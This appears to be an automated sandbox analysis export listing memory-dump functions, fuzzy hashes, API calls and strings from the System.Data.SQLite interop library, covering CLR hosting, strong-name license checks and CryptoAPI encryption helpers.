Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: 6e4c5410f7ea03b28c3a5d1f0fa75dac8d1cbe430a871a2c1034080292d090f7
Instruction ID: b9c9d8ba3a92977bfe40f0f45a17448d263d2cfb5f8ea882da8c7c1c4d71c178
Opcode Fuzzy Hash: 6e4c5410f7ea03b28c3a5d1f0fa75dac8d1cbe430a871a2c1034080292d090f7
Instruction Fuzzy Hash: C111A3725112029FFB009FD9D886859FB68FB4622D380813BE51C9B600DB3AE956CFD1

Function 6BC067F0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000), ref: 6BC06899

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: bbf3d398459fb2b6ea8ef3f5eba10cada9158bcc6fffdce565f328763d8d338f
Instruction ID: 78e7849d9dca69b2951cd107881e212c24f4cf98cfa1a33830ca377ab87daabb
Opcode Fuzzy Hash: bbf3d398459fb2b6ea8ef3f5eba10cada9158bcc6fffdce565f328763d8d338f
Instruction Fuzzy Hash: E81182B59156018BFF00DF28E84741AB3A4BB463193C01135E82ADB201EB3BE65FCB75

Function 6BCE19F0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 6BCE1A0C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: 8e3fe74ffdd0f9ae50a522fe9ba4256f9ac87e226e53c18d4aebc5c0acc2684a
Instruction ID: fcd59422812e21d857a2a6fe98fdf891bdd8dd1b9cedf97c8a07a9fe2caee86f
Opcode Fuzzy Hash: 8e3fe74ffdd0f9ae50a522fe9ba4256f9ac87e226e53c18d4aebc5c0acc2684a
Instruction Fuzzy Hash: 3301AD77750129DBC7109EACE481AAB73A9EBD4361F108026FA5497200E3789962DBF0

Function 02CC6450 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 02CC648D

Memory Dump Source

Source File: 00000007.00000002.2163193742.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2cc0000_v2.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4361fe726f64030a13ebe4c3a4fd6eab14fc04cf3cc731ceac059ca03ef37cbc
Instruction ID: 26f51a9a4d98a79bbacd9036cd7c20bcf62214ba7fa5b9eba6c6d06046e71d8a
Opcode Fuzzy Hash: 4361fe726f64030a13ebe4c3a4fd6eab14fc04cf3cc731ceac059ca03ef37cbc
Instruction Fuzzy Hash: FE01ED78725A648FCF16AB74A11E1AD7FB9AF88711B01005DF957D7344DF340A42CB8A

Function 02CC6460 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 02CC648D

Memory Dump Source

Source File: 00000007.00000002.2163193742.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2cc0000_v2.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0617fd2ffbf83c3fcd0951892249c23fec04d1ef4d04e302f411b6a40730d320
Instruction ID: cb8a5359f8611e1fa6b168312c019f7067e04531f357e96d37a6684355a3b1b7
Opcode Fuzzy Hash: 0617fd2ffbf83c3fcd0951892249c23fec04d1ef4d04e302f411b6a40730d320
Instruction Fuzzy Hash: D0019A78B20E249F8F55AB64A11E16D7FB9BB88711B11011DF917D7340DF340A428BDA

Function 6BC5B260 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SI9dbf9d88aa001ea6.SQLITE.INTEROP(00000004,6BCFEFE4,6BCC5697), ref: 6BC5B270

Part of subcall function 6BC5D090: SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A4DE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,?,?,6BC6103B,00000012,6BCFF004,?,6BCC5752), ref: 6BC5D0BA

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.I9dbf9d88aa001ea6.
String ID:
API String ID: 3129734836-0
Opcode ID: 83faae2203383f0e1459d3b94846cbe66caf064c6ffad7a2786aeadb0cfa1d4f
Instruction ID: 12dcdffcecd57575e26c1696f9f285b613e7a77734cddf8457dfdeb4dc8cd5e1
Opcode Fuzzy Hash: 83faae2203383f0e1459d3b94846cbe66caf064c6ffad7a2786aeadb0cfa1d4f
Instruction Fuzzy Hash: 7401C9B1819706DAFF448FA4D847309BAA0A70A31AF80012EE1199E251E77CC16B8B1D

Function 6BC14F00 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC14F3D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: fd1f06ef651f2a7ab7bf677ef6c34145830bda350c842993e89b3fd2993b7a17
Instruction ID: f64cb5256b9606c2ab04797f35f64f3a9bc182005ffb79d83695157b38d2ec4b
Opcode Fuzzy Hash: fd1f06ef651f2a7ab7bf677ef6c34145830bda350c842993e89b3fd2993b7a17
Instruction Fuzzy Hash: 3BF0E532B3A11037D610556AAC05E6B776DCFD2958F048025BD08E7300FA78DB01D5F1

Function 6BBFF560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BBFF56A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f16064faa86de4dc8ba8ae4a60403ccdbe4809c93ad6ee5ef1977a1cb9bdd78b
Instruction ID: f8b84e03927b6bb668d42d2b72462c02d81d17ab92cccf21ad83d954c106e0eb
Opcode Fuzzy Hash: f16064faa86de4dc8ba8ae4a60403ccdbe4809c93ad6ee5ef1977a1cb9bdd78b
Instruction Fuzzy Hash: 06E0DF353003846BC6309A6BDC09C4B3B6DEBC6B25F4100A5F70C8B241D53AD816C2B1

Function 012EE684 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_12ed000_v2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ba88630f4f806594b6535b8db494e60a769272e923b2d1ea25614877744fc4
Instruction ID: 865e6c8b57acb478204fb6d5d5d1ab9b93aafd3cc366ada72c23aa31e359bab7
Opcode Fuzzy Hash: 73ba88630f4f806594b6535b8db494e60a769272e923b2d1ea25614877744fc4
Instruction Fuzzy Hash: 2D2134B5554200EFDB09DF18D9C8B26BFE5FB84314F64C9ADD9090F246C376D806CA62

Function 012EE4D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_12ed000_v2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844f55b9ea315d34d5ac99657749e9e77fc5e2a8e0258ab97745b7cff8d7c2fe
Instruction ID: 899cf08e3373c9bb4f9076c7b18084cd68eb15000fd599bb4bd5cf93eec2ca8f
Opcode Fuzzy Hash: 844f55b9ea315d34d5ac99657749e9e77fc5e2a8e0258ab97745b7cff8d7c2fe
Instruction Fuzzy Hash: 59215BB1524241EFDB01DF18E9C8B26BFE5FB88314F65C56DE9090B246E37AD406C672

Function 012EE67F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_12ed000_v2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 0939521da92767f216085e7dee3e78f6f037a0625d3cb0a4acac7d5350ea5b14
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 6E11DD79544280CFDB06CF14D5C8B15BFB2FB84314F24C6A9D9494B656C33AD40ACB62

Non-executed Functions

Function 6BBF8910 Relevance: 240.4, APIs: 74, Strings: 63, Instructions: 620memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BBF89B5
OutputDebugStringA.KERNEL32(invalid ICLRRuntimeHost.,?,?,6BC6F705), ref: 6BBF89D8
GetProcessHeap.KERNEL32(?,?,6BC6F705), ref: 6BBF89E8
OutputDebugStringA.KERNEL32(invalid process heap.,?,?,6BC6F705), ref: 6BBF89FB
GetLastError.KERNEL32(?,?,6BC6F705), ref: 6BBF8A01
OutputDebugStringA.KERNEL32(could not free strong name buffer.), ref: 6BBF914C
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,6BC6F705), ref: 6BBF9199
_memset.LIBCMT ref: 6BBF91B1
__snprintf.LIBCMT ref: 6BBF91CE
OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC6F705), ref: 6BBF91DE

Strings

bad callback from setup method., xrefs: 6BBF90A0
v4.0.30319, xrefs: 6BBF8D66, 6BBF8D7B
invalid process heap., xrefs: 6BBF89F6
<unknown>, xrefs: 6BBF91B7
missing CLR function., xrefs: 6BBF8D0A
CLRCreateInstance, xrefs: 6BBF8CFA
modern strong name token failure., xrefs: 6BBF8E6A
bad assembly path env size., xrefs: 6BBF910E
invalid ICLRRuntimeHost., xrefs: 6BBF89D3
assembly path env success., xrefs: 6BBF8A89
could not execute verify method., xrefs: 6BBF90DA
System.Data.SQLite.SQLiteExtra, xrefs: 6BBF8CA8
could not get ICLRRuntimeInfo., xrefs: 6BBF8D88
CLR creation not implemented., xrefs: 6BBF8D4D
LicenseAssemblyPath, xrefs: 6BBF8A73
assembly path found via module., xrefs: 6BBF8BE9
MSCorEE, xrefs: 6BBF8CE3
could not trim module file name., xrefs: 6BBF8B06
modern strong name check failure., xrefs: 6BBF8E21
x86, xrefs: 6BBF8B1D
strong name size and data matched., xrefs: 6BBF8F2D
assembly path not found via process., xrefs: 6BBF8BBD
SdkCallback_%lX_%lX_%lX, xrefs: 6BBF8FDA
detected .NET Core in process., xrefs: 6BBF8C87
0, xrefs: 6BBF8C26
no current application domain?, xrefs: 6BBF8F99
ICLRRuntimeInfo not loadable., xrefs: 6BBF8DC6
good callback from setup method., xrefs: 6BBF9075
ARM, xrefs: 6BBF8B3F
Verify, xrefs: 6BBF8CA3
assembly path not trusted., xrefs: 6BBF8C5A
could not free strong name buffer., xrefs: 6BBF9147
could not get module file name., xrefs: 6BBF8B9D
verify method returned success., xrefs: 6BBF8CD7
could not get ICLRStrongName., xrefs: 6BBF8DF7
assembly path not found via module., xrefs: 6BBF8B85
verify method returned failure., xrefs: 6BBF90B2
assembly path is trusted., xrefs: 6BBF8C6F
strong name token size mismatch., xrefs: 6BBF8EBC
modern strong name check unverified., xrefs: 6BBF8E38
could not unset setup method callback., xrefs: 6BBF903A
missing CLR module in process., xrefs: 6BBF8CEE
strong name check was not verified., xrefs: 6BBF8E8E
assembly path env failure., xrefs: 6BBF90F1
LicenseOtherAppDomain, xrefs: 6BBF8F67
modern strong name check verified., xrefs: 6BBF8E80
could not allocate path., xrefs: 6BBF8A4C
v2.0.50727, xrefs: 6BBF8D5F
Win32, xrefs: 6BBF8B35
eeeSdk1: %s HRESULT 0x%016X, xrefs: 6BBF91BC
could not get setup method callback., xrefs: 6BBF901C
x64, xrefs: 6BBF8B2B
System.Data.SQLite.SEE.License, xrefs: 6BBF8A23, 6BBF8B61, 6BBF8B66
ARM64, xrefs: 6BBF8B49
assembly path found via process., xrefs: 6BBF8BE0
.dll, xrefs: 6BBF8B6A
ICLRRuntimeInfo loadable failure., xrefs: 6BBF8DAF
verify method unreachable., xrefs: 6BBF90CF
CoreCLR, xrefs: 6BBF8C7C
strong name token data mismatch., xrefs: 6BBF8F18
strong name token data missing., xrefs: 6BBF90E3
could not create ICLRMetaHost., xrefs: 6BBF8D36
assembly path env not found., xrefs: 6BBF8AB5

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: DebugOutputString$Heap_memset$ErrorFreeLastProcess__snprintf
String ID: .dll$0$<unknown>$ARM$ARM64$CLR creation not implemented.$CLRCreateInstance$CoreCLR$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$LicenseAssemblyPath$LicenseOtherAppDomain$MSCorEE$SdkCallback_%lX_%lX_%lX$System.Data.SQLite.SEE.License$System.Data.SQLite.SQLiteExtra$Verify$Win32$assembly path env failure.$assembly path env not found.$assembly path env success.$assembly path found via module.$assembly path found via process.$assembly path is trusted.$assembly path not found via module.$assembly path not found via process.$assembly path not trusted.$bad assembly path env size.$bad callback from setup method.$could not allocate path.$could not create ICLRMetaHost.$could not execute verify method.$could not free strong name buffer.$could not get ICLRRuntimeInfo.$could not get ICLRStrongName.$could not get module file name.$could not get setup method callback.$could not trim module file name.$could not unset setup method callback.$detected .NET Core in process.$eeeSdk1: %s HRESULT 0x%016X$good callback from setup method.$invalid ICLRRuntimeHost.$invalid process heap.$missing CLR function.$missing CLR module in process.$modern strong name check failure.$modern strong name check unverified.$modern strong name check verified.$modern strong name token failure.$no current application domain?$strong name check was not verified.$strong name size and data matched.$strong name token data mismatch.$strong name token data missing.$strong name token size mismatch.$v2.0.50727$v4.0.30319$verify method returned failure.$verify method returned success.$verify method unreachable.$x64$x86
API String ID: 2919618621-37461390
Opcode ID: 2dbcb3c85acf92f664213b12db51612d76e44d0907eb41eecb101663927fbf0c
Instruction ID: 26228ae2323ae39014bcb11ffa3bfe1b3f0453a471288dfad221b7e6e173d33d
Opcode Fuzzy Hash: 2dbcb3c85acf92f664213b12db51612d76e44d0907eb41eecb101663927fbf0c
Instruction Fuzzy Hash: D522C370918385EFE710DF65CC88B5ABBF9EB8A714F40091CF1859B241DB7CD94A8B62

Function 6BBF9200 Relevance: 79.0, APIs: 22, Strings: 23, Instructions: 222libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(CoreCLR,?,?), ref: 6BBF9244
OutputDebugStringA.KERNEL32(detected .NET Core in process.,?,?), ref: 6BBF9257
GetProcAddress.KERNEL32(00000000,GetCLRRuntimeHost), ref: 6BBF925F
OutputDebugStringA.KERNEL32(ICLRRuntimeHost2 start failure.,?,?), ref: 6BBF92A0
OutputDebugStringA.KERNEL32(could not get ICLRRuntimeHost2.,?,?), ref: 6BBF92AC
OutputDebugStringA.KERNEL32(missing CoreCLR function.,?,?), ref: 6BBF92B8
GetModuleHandleW.KERNEL32(MSCorEE,?,?), ref: 6BBF92C9
OutputDebugStringA.KERNEL32(missing CLR module in process.,?,?), ref: 6BBF92DA
GetLastError.KERNEL32(?,?), ref: 6BBF92DC
OutputDebugStringA.KERNEL32(ICLRRuntimeHost query success.,?,?), ref: 6BBF943B
_memset.LIBCMT ref: 6BBF94A6
__snprintf.LIBCMT ref: 6BBF94C2
OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?), ref: 6BBF94D1

Strings

ICLRRuntimeHost2 start failure., xrefs: 6BBF929B
v4.0.30319, xrefs: 6BBF939E
ICLRRuntimeHost2 start success., xrefs: 6BBF9291
<unknown>, xrefs: 6BBF94AC
missing CLR function., xrefs: 6BBF9314
CLRCreateInstance, xrefs: 6BBF92FE
could not get ICLRRuntimeHost., xrefs: 6BBF942D
ICLRRuntimeInfo loadable failure., xrefs: 6BBF93E2
CorBindToRuntimeEx success., xrefs: 6BBF9374
ICLRRuntimeHost query success., xrefs: 6BBF9436
missing CLR module in process., xrefs: 6BBF92D5
missing CoreCLR function., xrefs: 6BBF92B3
could not get ICLRRuntimeInfo., xrefs: 6BBF93B5
CLR creation not implemented., xrefs: 6BBF934D
CoreCLR, xrefs: 6BBF9221
MSCorEE, xrefs: 6BBF92C4
detected .NET Core in process., xrefs: 6BBF9252
GetCLRRuntimeHost, xrefs: 6BBF9259
could not create ICLRMetaHost., xrefs: 6BBF933A
eeeSdk1: %s HRESULT 0x%016X, xrefs: 6BBF94B1
ICLRRuntimeInfo not loadable., xrefs: 6BBF93F9
could not get ICLRRuntimeHost2., xrefs: 6BBF92A7
CorBindToRuntimeEx failure., xrefs: 6BBF937E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: DebugOutputString$HandleModule$AddressErrorLastProc__snprintf_memset
String ID: <unknown>$CLR creation not implemented.$CLRCreateInstance$CorBindToRuntimeEx failure.$CorBindToRuntimeEx success.$CoreCLR$GetCLRRuntimeHost$ICLRRuntimeHost query success.$ICLRRuntimeHost2 start failure.$ICLRRuntimeHost2 start success.$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$MSCorEE$could not create ICLRMetaHost.$could not get ICLRRuntimeHost.$could not get ICLRRuntimeHost2.$could not get ICLRRuntimeInfo.$detected .NET Core in process.$eeeSdk1: %s HRESULT 0x%016X$missing CLR function.$missing CLR module in process.$missing CoreCLR function.$v4.0.30319
API String ID: 2196009414-3302285550
Opcode ID: 251d093005941b39bfe04c54c0089e86e26bbd902196c31e195f11889d2e9d94
Instruction ID: 2abf859efbd8b8f2e94f950522f8f09ce966cb76c1ee171fa31529d871609839
Opcode Fuzzy Hash: 251d093005941b39bfe04c54c0089e86e26bbd902196c31e195f11889d2e9d94
Instruction Fuzzy Hash: F071D871C105599FD720EFA8CCC099DB3B8BB89320F0545A8E558EB201DA39DE4ACF61

Function 6BCC69D0 Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 221encryptionCOMMON

Download Yara Rule

APIs

SIffb8076c269e2a85.SQLITE.INTEROP(?), ref: 6BCC6A43
SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BCC6A5A
SIffb8076c269e2a85.SQLITE.INTEROP(?), ref: 6BCC6A70
SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BCC6A80
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 6BCC6AAF
GetLastError.KERNEL32(?,00008004,00000000,00000000,?), ref: 6BCC6AB9
SIdb45e174afb28e2c.SQLITE.INTEROP(CryptEncrypt failed, code=%lu,00000000,?,?,?,00000000,?), ref: 6BCC6AC5
SI905dcc543d48caab.SQLITE.INTEROP(?,00000000,000000FF,CryptEncrypt failed, code=%lu,00000000,?,?,?,00000000,?), ref: 6BCC6AD3
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,?), ref: 6BCC6BFB
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,00000000,?), ref: 6BCC6C04
CryptDestroyKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?), ref: 6BCC6C15
CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?), ref: 6BCC6C24

Strings

CryptCreateHash failed, code=%lu, xrefs: 6BCC6AC0
CryptDecrypt failed, code=%lu, xrefs: 6BCC6BDA
CryptHashData failed, code=%lu, xrefs: 6BCC6B02
CryptDeriveKey failed, code=%lu, xrefs: 6BCC6B4B
CryptEncrypt failed, code=%lu, xrefs: 6BCC6BB6
missing encryption context, xrefs: 6BCC69F7

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Crypt$DestroyHashI8b0d9e6837e61abc.Iaa0f8e0c251cfd1d.Iffb8076c269e2a85.$CreateErrorI905dcc543d48caab.Idb45e174afb28e2c.Last
String ID: CryptCreateHash failed, code=%lu$CryptDecrypt failed, code=%lu$CryptDeriveKey failed, code=%lu$CryptEncrypt failed, code=%lu$CryptHashData failed, code=%lu$missing encryption context
API String ID: 3483430705-1659892492
Opcode ID: 69e6bf696a031a202070ce252fd7dcb42ae3c1c076e530a3d7148d16f68e0908
Instruction ID: ce8cc46ee3b0c37223c6be7d3bc0cc43d98cdf1d2886b71a3b1fba5ea5d6320f
Opcode Fuzzy Hash: 69e6bf696a031a202070ce252fd7dcb42ae3c1c076e530a3d7148d16f68e0908
Instruction Fuzzy Hash: 6A6115B1614200AFE700CF64DD45F6B77A8EF85718F108669F9599B280FB39EB0587A3

Function 6BCC6C50 Relevance: 40.6, APIs: 15, Strings: 8, Instructions: 369COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BCC6CF1
SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BCC6D2D
SI905dcc543d48caab.SQLITE.INTEROP(?,SHA3 size should be one of: 224 256 384 512,000000FF), ref: 6BCC6D5D
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCC6E20
SI25d73a5ab4d6cacb.SQLITE.INTEROP(?,00000000), ref: 6BCC6E52
SI30455e90830ca460.SQLITE.INTEROP(?,00000000), ref: 6BCC6E8F
SI558bdfe0e27562ea.SQLITE.INTEROP(?,00000000,00000009,?,00000000), ref: 6BCC6F21
SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000000,00000009,?,00000000,00000009,?,00000000), ref: 6BCC6FBC
SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000000,?,?,?,?,?,?,?,00000009,?,00000000,00000009,?,00000000), ref: 6BCC6FD4
SI8259474343588db4.SQLITE.INTEROP(?,00000000,?,00000000,?,?,?,?,?,?,?,00000009,?,00000000,00000009,?), ref: 6BCC6FDD
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCC7014
